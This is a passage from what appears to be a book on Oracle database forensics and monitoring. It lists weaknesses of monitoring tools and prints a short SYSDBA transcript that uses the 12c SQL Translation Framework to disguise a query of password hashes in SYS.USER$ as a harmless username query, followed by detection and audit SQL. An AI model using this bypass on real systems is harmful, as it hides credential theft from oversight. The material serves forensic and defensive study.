An interesting external source of evidence is JIRA, which holds the records of changes written before those changes were executed. JIRA is a common development tool and allows a user to edit a ticket; it also records those edits and keeps the previous versions of the ticket's contents. If a change ticket has been edited AFTER the change was made on production, a JIRA administrator can still view the previous versions of the ticket. Not all users realize this and may be caught out: it is telling to see a ticket edited after a production change has failed, in order to cover up the mistake made in development.
A third external source of data regarding the usage of the database is the set of security monitoring logs, such as those from McAfee (previously Sentrigo), AppSecInc, Guardium, and Imperva. These security monitoring tools, however, tend to suffer from some common weaknesses:
- Difficulty logging all SYS activity. An attacker will run their commands as SYS, just as the system itself does, so if the monitoring tool does not record SYS actions it is not effective.
- Inability to monitor encrypted traffic. Note that TCPS (SQL*Net over TLS) is a free upgrade on all versions of Oracle Database at the time of writing, though it is not turned on by default.
- Bypassable by sending many commands in one go as a flood (e.g., placing the malicious command in the middle of a batch job), since the tools sample traffic rather than capture every statement. The counter is to increase the sampling frequency.
- Increased sampling frequency reduces the performance of the tools, typically by slowing down the database.
- Non-contextual, in that they are unable to accurately map object and user identities to the database's own context, and they cannot audit recursive and dynamic SQL.
The result of these weaknesses is that solutions based upon local memory agents tend to be more secure than network-based packet-sniffing technologies, and produce fewer false positives. However, local memory agent solutions carry potentially higher maintenance costs as the OS and database software are upgraded over time. Over the past half decade the security focus for RDBMS has moved towards preventing the abuse of internal privilege escalation. Network-based monitoring reads sessions on the wire before they reach the database itself, so it is not well positioned to monitor privileged sessions (a local connection such as conn / as sysdba never crosses the network at all); hence the rise of memory agent monitoring. An example of how privileged access can be used to bypass network monitoring solutions such as Guardium is the SQL Translation Framework introduced in Oracle 12c, which translates one SQL statement into another before it is executed. The framework's intended purpose is to let Transact-SQL statements from a migrated application be converted to Oracle SQL without changing the application; however, a privileged user can also register a translation so that a statement which looks on the wire like a harmless query of usernames is executed by the database as a query of the password hashes in SYS.USER$, as follows:
conn / as sysdba
SQL> exec dbms_sql_translator.create_profile('BYPASSNETMON');
PL/SQL procedure successfully completed.
SQL> select object_name, object_type from dba_objects where object_name like 'BYPASSNETMON';
OBJECT_NAME
--------------------------------------------------------------------------------
OBJECT_TYPE
-----------------------
BYPASSNETMON
SQL TRANSLATION PROFILE
SQL> exec dbms_sql_translator.register_sql_translation('BYPASSNETMON','select username from dba_users','select user, password from sys.user$');
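The counterpart to the bypass above is the set of data-dictionary checks an examiner can run to find such a profile after the fact. The following is an added example and not part of the book's text. It assumes Oracle 12c or later (the release that introduced the SQL Translation Framework), a SYSDBA connection, and that the profile name BYPASSNETMON from the transcript above is only a filter value; the V$SESSION.SQL_TRANSLATION_PROFILE_ID column, its mapping to DBA_OBJECTS.OBJECT_ID, and the unified audit policy syntax are 12c features that should be confirmed on the release in hand. Note that a translation only affects a session once a profile has been activated for it, so a profile's mere existence shows intent, not necessarily use.

```sql
-- Added example (not from the original page): forensic checks for abuse of
-- the Oracle 12c SQL Translation Framework. Run from a SYSDBA session.
-- Assumptions: Oracle 12c or later; BYPASSNETMON is the profile name from
-- the page's transcript and is used here only as a filter value.

-- 1. Inventory every translation profile. On a database that was never
--    migrated from another RDBMS there should be none at all.
SELECT owner, object_name, object_id, created, last_ddl_time
  FROM dba_objects
 WHERE object_type = 'SQL TRANSLATION PROFILE'
 ORDER BY created;

-- 2. Show what each registered translation rewrites. SQL_TEXT is what the
--    client sends (and what a network monitor records); TRANSLATED_TEXT is
--    what the database actually executes.
SELECT owner, profile_name, sql_text, translated_text
  FROM dba_sql_translations
 ORDER BY owner, profile_name;

-- 3. Flag translations whose executed text reaches into the SYS password
--    store while the visible text does not. SPARE4 is the column of
--    SYS.USER$ that holds the 12c password hashes.
SELECT owner, profile_name, sql_text, translated_text
  FROM dba_sql_translations
 WHERE (   UPPER(translated_text) LIKE '%USER$%'
        OR UPPER(translated_text) LIKE '%SPARE4%')
   AND UPPER(sql_text) NOT LIKE '%USER$%';

-- 4. Pull the exact profile from the page's example, if it is present.
SELECT owner, profile_name, sql_text, translated_text
  FROM dba_sql_translations
 WHERE profile_name = 'BYPASSNETMON';

-- 5. Sessions that currently have a translation profile active.
--    SQL_TRANSLATION_PROFILE_ID was added to V$SESSION in 12c; confirm with
--    DESC V$SESSION before relying on it. Assumption: the ID is the
--    profile's DBA_OBJECTS.OBJECT_ID, so it can be matched against step 1.
SELECT sid, serial#, username, osuser, machine, program,
       sql_translation_profile_id
  FROM v$session
 WHERE sql_translation_profile_id IS NOT NULL;

-- 6. Going forward, record every call into DBMS_SQL_TRANSLATOR with a
--    unified audit policy (12c). Unified audit policies also capture
--    statements run as SYS, which addresses the first monitoring weakness
--    above. This step changes database state: run it only after the
--    evidence from steps 1-5 has been preserved.
CREATE AUDIT POLICY sql_translator_pol
  ACTIONS EXECUTE ON sys.dbms_sql_translator;
AUDIT POLICY sql_translator_pol;

-- Later review of what the policy caught.
SELECT event_timestamp, dbusername, object_schema, object_name, sql_text
  FROM unified_audit_trail
 WHERE unified_audit_policies LIKE '%SQL_TRANSLATOR_POL%'
 ORDER BY event_timestamp;
```

Steps 2 and 3 are the ones that matter for the bypass described above: the network monitor has a record of the innocuous SQL_TEXT, and only the dictionary can show that the database executed TRANSLATED_TEXT instead. A memory agent sees the translated statement at execution time, which is why the book favours it over packet sniffing for privileged sessions.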